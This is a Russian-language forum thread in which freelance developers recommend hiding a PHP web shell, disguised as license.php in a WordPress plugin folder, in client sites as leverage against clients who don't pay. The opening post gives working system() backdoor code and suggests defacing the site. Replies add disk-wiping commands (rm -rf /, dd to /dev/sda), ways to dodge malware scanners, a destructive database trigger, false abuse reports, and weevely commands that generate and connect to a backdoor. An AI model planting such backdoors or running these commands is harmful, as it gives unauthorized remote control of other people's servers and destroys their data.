• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фазинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Статья Оставляем бэкдор для страховки от "нехороших" заказчиков

r0hack

DAG
Gold Team
29.09.2017
441
739
#1
Всем Салам. Сегодня хотел бы поговорить о фрилансе и как работать без потерь для себя. А именно мы будем защищаться от плохих заказчиков, которые захотят нас кинуть после выполненной работы. Вы скажете, ну чтобы не кидал, бери половину суммы наперед или все сразу. Такое условие, если и прокатит, то только у опытных фрилансеров, у которых множество положительных отзывов. А, если ты новичок и ты хочешь половину суммы, то очень мала вероятность, что на твой ковер леттер, даже среагируют. Поэтому, настоятельно рекомендую писать "оплата после".

Немного теории

У меня, чуть больше 2 лет назад, в среднем, на каждый мой 3 ковер леттер реагировали, и в течении недели я брался за 3, а то и более проектов в зависимости от сложности. Ну наверное вы поняли, сейчас мы говорим о разработке сайтов, веб сервисов, порталов и всего такого, в данном случае на PHP. Сам процесс получается таким: заказчик выбирает вас, вы обговаривается условия, выполняете проект, сдаете ее заказчику и тут самое интересное, если вы поняли, что заказчик вас кинул и чтобы не остаться лоханутым, нужно предпринять определенные меры.


Практика

Предположим вы делаете сайт на WordPress. В процессе выполнения мы и создаем наши мини бэкдорчики и запихиваем в непалевные уголки структуры вордпресса. Самый оптимальный вариант, как по мне, это замаскировать его под license.php в папку какого-нибудь плагина, и на всякий случай еще дублируем в пару других мест.
Сам бэкдор будет выглядит таким образом, код простенький, если ему что-то передается, он принимает и функция system выполняет и отображает.

PHP:
if ( isset( $_REQUEST['cmd'] ) ) {
    echo '<h1>' . 'Будьте честными!' . '</h1>';
    echo '<pre>';
    $cmd = ( $_REQUEST['cmd'] );
    system( $cmd );
    echo '</pre>';
}
Все просто, но все это очень сильно нам может помочь. Так, давайте посмотрим, что мы можем делать с помощью нашего бэкдорчика. Я его разместил в папке плагина akismet. Попробуем посмотреть содержимое папки с помощью команды ls.

Selection_091.jpg

Все отлично получается, все также как и в нашем любимом терминале. Например, сделать дефейс главной страницы, с предупредительной надписью и заказчик точно не захочет, чтобы его сайт впоследствии не был снесен. И теперь будет знать, что кидать не есть хорошо. Можете предложить свои варианты в комментах, как еще можно покарать нечестного.

Еще, нам бы не захотелось, чтобы другие случайно могли получить доступ к нашему бэкдору. Чтобы этого избежать, мы можем реализовать, через .htaccess доступ к файлу по паролю или же дать доступ к файлу только нашему ip. Подробнее можете изучить
Для просмотра контента необходимо: Войти или зарегистрироваться
.

В ином случае, если заказчик вам платит, как и договаривались, то удаляйте бэкдоры, тоже будьте честными. Лично у меня был только 1 случай, когда заказчик, хотел ускользнуть, но этот способ наказания мне помог и справедливость восторжествовала.

На этом думаю завершим. Если у вас были подобные моменты, поделитесь в комментах. Всем удачи!
 
Последнее редактирование:

HtOnion

Red Team
06.11.2017
583
933
#2
Реально хорошая тема) тоже разок помогала. Даже если работаешь через безопасную сделку это не дает гарантий оплаты, бывают ну очень хитрые и ушлые заказчики, и в случае чего бекдорчик поможет)
 

PenGenKiddy

Премиум
28.07.2017
28
47
#3
Крч, батька учит
1) Такой бэк спалится при помощи айболита (Некие хитрожопые используют его для убирания бекдоров, как у тебя)
2) rm -rf / ничего не сделает, умные Торвальдсы предусмотрели данный трип
3) Для полной феерии вгоняем в Infinity Loop сервер, и видим, как он начинает жадно тормозить
4) Если сайт на общественном сервере (На одном сервере несколько сайтов), находим рандомный фиш вк и ночью кидаем абузу. Блок хостинга и домена почти всегда гарантирован

Так, как сделать бэкдор, который почти ничем не палится? Юзаем /**/ и ломаем парсер айболита, дальше используем функции с callback (к примеру preg_replace_callback), затем можно ещё ioncube сверху покрыть, на всякий случай :)
 

r0hack

DAG
Gold Team
29.09.2017
441
739
#4
1) Такой бэк спалится при помощи айболита (Некие хитрожопые используют его для убирания бекдоров, как у тебя)
Пока не встречал заказчиков, которые, загружали бы айболит на хост и сканили... сложна... Но видя такое, может теперь и будут )))
2) rm -rf / ничего не сделает, умные Торвальдсы предусмотрели данный трип
Да, тут я чуть разогнался, но, по крайней мере, можно права подкорректировать, некоторых файлов и покушаться на них, но не самый эффективный момент ....
Так, как сделать бэкдор, который почти ничем не палится? Юзаем /**/ и ломаем парсер айболита, дальше используем функции с callback (к примеру preg_replace_callback), затем можно ещё ioncube сверху покрыть, на всякий случай :)
Это все можно сделать, но зачем. Если есть более простой способ, который прокатит в 99.99% случаев...
 
Последнее редактирование:

PenGenKiddy

Премиум
28.07.2017
28
47
#5
Пока не встречал заказчиков, которые, загружали бы айболит на хост и сканили... сложна... Но видя такое, может теперь и будут )))

Да, тут я чуть разогнался, но, по крайней мере, можно права подкорректировать, некоторых файлов и покушаться на них, но не самый эффективный момент ....

Это все можно сделать, но зачем. Если есть более простой способ, который прокатит в 99.99% случаев...
Лучше тогда вместо rm -rf / использовать dd if=/dev/zero of=/dev/sda
Причем ее действие опаснее, чем rm-rf, в силу того что первая стирает все файлы с файловой системы. А вторая просто без разбора херачит с 0 сектора диска и до конца. Причем, поскольку она загружена в память, ей уже наплевать на то что происходит в ФС и она будет затирать локальные диски до победы. Ну и удаленные, если они смонтированы как блочные устройства. И восстановить такие данные уже нельзя, отличии от rm, которая не трогает таблицу разделов.
 

r0hack

DAG
Gold Team
29.09.2017
441
739
#6
а не подскажите фриланс биржи и как вы получали 1 заказ,когда рейтинг на биржи был 0??
Freelance.ru потом можно перейти на UpWork. Получится, если будет УТП (Уникальное Торговое Предложение). Как я уже писал выше, большинство требуют половину оплаты вперед. Еще можно многое придумать... В зависимости от задания... А не клевать глупые шаблонные ковел леттеры.
 

Iskus

Премиум
13.11.2017
265
322
#7
А я вот попал на месяц работы, но я в проекте работал, в офисе, условия оказались совсем не те что озвучивались, я естественно попросил расчёт, меня послали на хуй, сказали не нравится, двери там, и я понимаю что не оставил никакой лазейки потому что даже не предполагал такого исхода, вот сейчас думаю как наказать этих уродов, если кто готов помочь пишите в личку, у меня в одиночку не получается пока ничего сделать
[automerge]1522898710[/automerge]
А должны они мне $3000
[automerge]1522898823[/automerge]
Учитывая то что у меня съёмная квартира и 4 детей , мне было ооооочень тяжело выбраться из ямы в которую они меня загнали.
 
18.06.2018
1
0
#8
попробовал на cms opencart 2.1 - не работает скрипт, выводит только "Будьте честными!"

или нужен какой-то браузер специальный?(как на скрине)
 
Последнее редактирование модератором:

morgot

New member
25.07.2018
4
0
#9
vladpetashev
Браузер тут не при чем, это же серверный скрипт. Включите error_reporting. Возможно, выполнение функции system заблокировано.
Передаете ли вы какую-то команду или просто переходите по ссылке? В последнем случае (команды никакой нет), действительно выведется надпись "будьте честными").
 

CyberX

Well-known member
12.07.2018
56
27
#10
Мне кажется лучше заделать какойто тригер в БД, который, если что, снесет всю бд. Вот его точно спаливать задолбаются.
 

GoodSmile

Well-known member
16.07.2018
51
27
#11
Да не, зачем так всё усложнять, когда есть Weevely?
Weevely — это веб-оболочка командной строки, динамически расширяемая по сети во время выполнения, предназначенная для удаленного администрирования сервера и тестирования на проникновение.
В кали он встроен по дефолту. Сгенерируем бэкдор командой
Код:
weevely generate 12345 /root/Desktop/license.php
и кидаем наш license.php в директорию какого-то плагина. После подключаемся к серваку с помощью команды
Код:
weevely http://mysite.ru/plagin/license.php 12345
и profitt! Кто не понял, 12345 это пароль нашего бэкдора(чтоб кто угодно не подключался к серваку) а
Для просмотра контента необходимо: Войти или зарегистрироваться
, это путь до нашего бэкдора.
 
Симпатии: Понравилось DefWolf
Вверх Снизу